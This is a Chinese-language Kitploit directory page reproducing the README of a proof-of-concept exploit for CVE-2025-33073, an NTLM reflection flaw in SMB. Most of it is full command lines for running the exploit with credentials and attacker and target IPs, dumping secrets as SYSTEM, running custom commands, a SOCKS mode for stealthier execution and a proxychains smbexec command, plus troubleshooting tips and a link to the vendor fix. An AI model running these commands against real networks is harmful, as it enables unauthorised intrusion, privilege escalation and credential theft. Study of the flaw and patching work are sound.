Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/starscow/cve-2025-33073
漏洞分析漏洞利用横向移动后渗透利用渗透测试红队
GitHubstarscow/cve-2025-33073

CVE-2025-33073

针对NTLM反射SMB漏洞的PoC漏洞利用程序。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-33073

针对 NTLM 反射 SMB 漏洞的 PoC 利用程序。

所有功劳归功于官方研究:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

前提条件

操作系统:Kali Linux(已预装大部分软件包)。

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py(包含在仓库中)
  • xterm(仅用于 GUI)

使用示例

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

自定义命令
除了运行 secretsdump 之外,还可以执行自定义命令。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
用于在成功以 SYSTEM 身份建立有效连接后更隐蔽地执行命令。此处 --target 和 --target-ip 应相同。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image 此外,也可以通过 proxychains 运行自定义命令,而不是转储 SAM。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

无需 DNS 要求的手动利用

如果您与目标设备处于同一广播域,且该设备易受 LLMNR 投毒攻击,则无需注册 DNS 记录即可利用该设备。

image

故障排除

  • 我注意到攻击有时会失败,因为攻击使用了主机名,这会导致 Kali 进行 DNS 查询。如果 Kali 未使用该 DNS 服务器,或者您从 impacket-ntlmrelayx 收到 '/ FAILED' 消息,请尝试将主机添加到您的 /etc/hosts 文件中。这应该能使攻击成功。
  • 如果使用 IP,攻击应该可以成功。有时多次运行会从失败变为 SUCCESS。到目前为止,尚不完全清楚为什么会发生这种情况。我认为这与网络有关。
  • 使用 -M 或 --method 尝试另一种强制方法。

Wireshark

发生本地 NTLM 身份验证 image

未发生本地 NTLM 身份验证,导致尝试 FAILED image

值得了解

  • xterm 支持使用鼠标中键进行复制和粘贴。
  • DNS 记录也应被客户端知晓,在某些情况下这可能需要更多时间。所谓更多时间,是指请等待几分钟。
  • 这只是一个 PoC,意味着尚未尝试绕过 AV/EDR。请自行承担使用风险。

如何修复

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

下载工具